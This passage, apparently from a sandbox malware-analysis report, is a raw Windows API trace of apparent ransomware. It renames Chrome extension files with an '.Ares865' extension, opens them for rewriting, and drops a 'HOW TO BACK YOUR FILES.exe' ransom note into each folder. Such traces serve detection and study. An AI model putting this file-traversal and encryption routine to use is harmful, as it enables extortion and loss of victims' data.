ftCreationTime.dwLowDateTime=0x86e4cab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ee60da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ee60da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.162] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.162] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.162] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.Ares865") returned 161 [0103.162] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.164] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=278) returned 1 [0103.167] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake" [0103.168] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake" [0103.168] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.168] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.168] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.169] GetLastError () returned 0x0 [0103.169] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.169] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ee60da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ee60da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.169] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.169] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.169] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" [0103.169] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0" [0103.169] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.169] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.170] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.170] GetLastError () returned 0x0 [0103.170] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.170] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ee86f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ee86f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.171] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.171] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.171] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.Ares865") returned 147 [0103.171] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.ares865"), dwFlags=0x1) returned 1 [0103.172] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.173] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3213) returned 1 [0103.175] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.Ares865") returned 146 [0103.175] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.ares865"), dwFlags=0x1) returned 1 [0103.177] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.177] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=143) returned 1 [0103.180] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.Ares865") returned 144 [0103.180] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.ares865"), dwFlags=0x1) returned 1 [0103.182] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.182] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=92) returned 1 [0103.185] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.Ares865") returned 142 [0103.185] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.ares865"), dwFlags=0x1) returned 1 [0103.187] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.187] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=91) returned 1 [0103.191] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.Ares865") returned 148 [0103.191] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.ares865"), dwFlags=0x1) returned 1 [0103.192] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.192] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=725) returned 1 [0103.195] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata" [0103.195] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata" [0103.195] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.195] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.196] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.196] GetLastError () returned 0x0 [0103.196] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.196] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x867288b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ee86f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ee86f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.196] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.196] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.197] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.Ares865") returned 165 [0103.197] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.ares865"), dwFlags=0x1) returned 1 [0103.198] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.199] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=352) returned 1 [0103.202] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.Ares865") returned 167 [0103.202] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.ares865"), dwFlags=0x1) returned 1 [0103.203] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.204] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11094) returned 1 [0103.207] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0103.207] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0103.207] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.207] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.208] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.208] GetLastError () returned 0x0 [0103.208] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.208] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ee86f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ee86f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", 